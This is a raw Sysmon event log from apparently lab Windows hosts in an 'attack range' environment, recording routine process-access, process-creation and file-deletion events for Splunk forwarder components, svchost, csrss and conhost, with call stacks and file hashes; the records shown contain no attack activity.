Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.862{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.861{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.861{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.861{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.861{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1657-6216-F906-000000003802}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.860{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1657-6216-F906-000000003802}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.859{C8EA50B7-1657-6216-F906-000000003802}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.695{C8EA50B7-1657-6216-F806-000000003802}11647080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1657-6216-F806-000000003802}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1657-6216-F806-000000003802}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.279{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1657-6216-F806-000000003802}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.280{C8EA50B7-1657-6216-F806-000000003802}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.094{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0267A4CFA51A5CE55B96C08BDE16EA2D,SHA256=ED3593F3C22760A2C174FADB68F1B50DE51AB0E7C283AEE22F98F862029B1155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:19.711{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D550552D342E6F174A89961DC32AC8B,SHA256=714367775D32E04E3423E2DE25EAF4E1431CAB1C5DF03B03CF5E04BBFCC4B818,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:20.727{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AC286A1542C79C7DB59130AFE7E29A7,SHA256=19886827532A467CD524489A436AB00AC753C6943B9F7D55D17B624630815A31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.931{C8EA50B7-1658-6216-FA06-000000003802}64686636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1658-6216-FA06-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1658-6216-FA06-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.731{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1658-6216-FA06-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.733{C8EA50B7-1658-6216-FA06-000000003802}6468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:20.244{C8EA50B7-1657-6216-F906-000000003802}65446708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 